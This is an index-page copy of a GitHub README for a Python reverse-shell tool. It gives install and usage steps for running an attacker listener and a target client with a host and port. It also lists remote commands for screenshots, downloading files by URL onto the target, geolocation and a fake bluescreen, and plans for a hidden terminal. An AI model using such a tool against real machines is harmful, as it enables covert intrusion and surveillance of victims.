Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/jcs090218/reverse_shell

Reverse shell implementation using Python
https://github.com/jcs090218/reverse_shell

exploit microservice reverse-shell vulnerability

Last synced: 27 days ago
JSON representation

Reverse shell implementation using Python

Awesome Lists containing this project

README

        

[![Python Ver.](https://img.shields.io/badge/python-%3E=_3.6-green.svg)](https://www.python.org/downloads/)
[![License: MIT](https://img.shields.io/badge/License-MIT-blue.svg)](https://opensource.org/licenses/MIT)

# Reverse Shell

Reverse shell implementation using Python.



## Installation

**NOTE**: Python 3.6 or higher is required.

```bash
# clone the repo
$ git clone https://github.com/jcs090218/reverse_shell

# change the working directory to reverse shell
$ cd reverse_shell

# install python3 and python3-pip if not exist

# install the requirements
$ pip3 install -r requirements.txt
```

## Usage

### 1. Listen for target

On attacker machine, run the `attacker.py` script.

```
python3 attacker.py [port]
```

### 2. Execute reverse shell

On target machine, run the `target.py` script.
```
python3 target.py [host] [port]
```

## Commands

```sh
# Halt
!dc Disconnect the target from this host, target will start reconnection process.
!shutdown Shutdown both `attacher` and `target`.

# Listen
!screenshot Screenshot the target machine.

# Cheat
!bluescreen Fake bluescreen. (Windows Only)
!dl Download file by URL onto the target machine.

# Information
!wan_ip Get the WAN IP.
!lan_ip Get the LAN IP.
!geo_info Get the geolocation on the target device.
```

## Features

### Implemented

* Auto reconnection
* Downloader (Download file to target machine)
* Screenshot
* Full control on the target machine.

### Not Implemented

* Packet encoder/decoder.

## TODOs
* Bluescreen (Fake)
* Hidden IP
* Hidden terminal
* Multi-target listening